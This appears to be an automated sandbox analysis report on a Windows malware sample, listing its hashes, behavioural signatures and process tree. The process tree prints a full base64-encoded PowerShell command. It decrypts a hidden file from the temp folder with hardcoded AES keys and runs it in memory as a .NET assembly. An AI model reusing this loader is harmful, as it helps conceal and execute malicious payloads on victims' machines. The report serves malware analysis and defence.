Analysis
-
max time kernel
122s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
23-05-2024 01:07
Static task
static1
Behavioral task
behavioral1
Sample
230cdd39e3e80f708c62b9742f83bca9345b0c49732b067633b8409e248bde0a.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
230cdd39e3e80f708c62b9742f83bca9345b0c49732b067633b8409e248bde0a.exe
Resource
win10v2004-20240508-en
General
-
Target
230cdd39e3e80f708c62b9742f83bca9345b0c49732b067633b8409e248bde0a.exe
-
Size
1.0MB
-
MD5
0bfde25a39f983c58a94d6ad2d95181e
-
SHA1
020285c7a771bb2f5e81badf92b558ae97932348
-
SHA256
230cdd39e3e80f708c62b9742f83bca9345b0c49732b067633b8409e248bde0a
-
SHA512
a864bdbfcdb55f6f574ca37a7d57a43ce382044dffc5eca7f1e87f79a97776f4fb9e9b984a4ad001ca4aa1fb851f45531fb22d2a0b62f4fb157a42bbe6152bc0
-
SSDEEP
24576:a/rEUhxLdtH9iIFaqo8kVG8QBi2oMnWldVvyKy:azvdcIFaG8//MUyf
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2616 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2616 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
230cdd39e3e80f708c62b9742f83bca9345b0c49732b067633b8409e248bde0a.exedescription pid process target process PID 1944 wrote to memory of 2616 1944 230cdd39e3e80f708c62b9742f83bca9345b0c49732b067633b8409e248bde0a.exe powershell.exe PID 1944 wrote to memory of 2616 1944 230cdd39e3e80f708c62b9742f83bca9345b0c49732b067633b8409e248bde0a.exe powershell.exe PID 1944 wrote to memory of 2616 1944 230cdd39e3e80f708c62b9742f83bca9345b0c49732b067633b8409e248bde0a.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\230cdd39e3e80f708c62b9742f83bca9345b0c49732b067633b8409e248bde0a.exe"C:\Users\Admin\AppData\Local\Temp\230cdd39e3e80f708c62b9742f83bca9345b0c49732b067633b8409e248bde0a.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEIAMwAsACAAMAB4ADkAMAAsACAAMAB4ADYARgAsACAAMAB4AEEAMAAsACAAMAB4AEQAOAAsACAAMAB4ADYAMwAsACAAMAB4AEQAMgAsACAAMAB4AEEANgAsACAAMAB4AEUAMwAsACAAMAB4ADQARAAsACAAMAB4ADYANwAsACAAMAB4AEYANwAsACAAMAB4ADUAMAAsACAAMAB4ADUAOQAsACAAMAB4ADYANAAsACAAMAB4AEYAMgAsACAAMAB4ADEANQAsACAAMAB4ADYAOAAsACAAMAB4ADgARgAsACAAMAB4AEUANQAsACAAMAB4AEYAMwAsACAAMAB4AEEANQAsACAAMAB4AEEAMQAsACAAMAB4ADcAMwAsACAAMAB4ADEARgAsACAAMAB4ADYAQgAsACAAMAB4ADMAMgAsACAAMAB4ADIANgAsACAAMAB4ADgARgAsACAAMAB4ADIARQAsACAAMAB4ADMAOAAsACAAMAB4ADUANgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAA5ADQALAAgADAAeABGAEYALAAgADAAeABBADEALAAgADAAeAA0ADQALAAgADAAeAA4AEEALAAgADAAeAA3AEUALAAgADAAeABGADcALAAgADAAeAA5AEEALAAgADAAeABDADIALAAgADAAeAAzADgALAAgADAAeAAyAEUALAAgADAAeABGADEALAAgADAAeAA0ADYALAAgADAAeABFAEUALAAgADAAeABGAEEALAAgADAAeAAwAEMAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2616
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
33KB
MD510f97ef3f035d5b8a83f74f0c3633797
SHA1abd9f893e205fbbad8184e513d06e67a9642f651
SHA2569702e4ea1ca9407c311a92252091f65f022a59c9261d712ab127ea667d331dc6
SHA5125f7e69ace5466b60ddc0377651ab43790a321578bb015d014b2f753dcfeb9d2a88501ff5e2b6e6383fcf3f296c178ec74aef23dabe46ef75bc7b27431f8c2f2d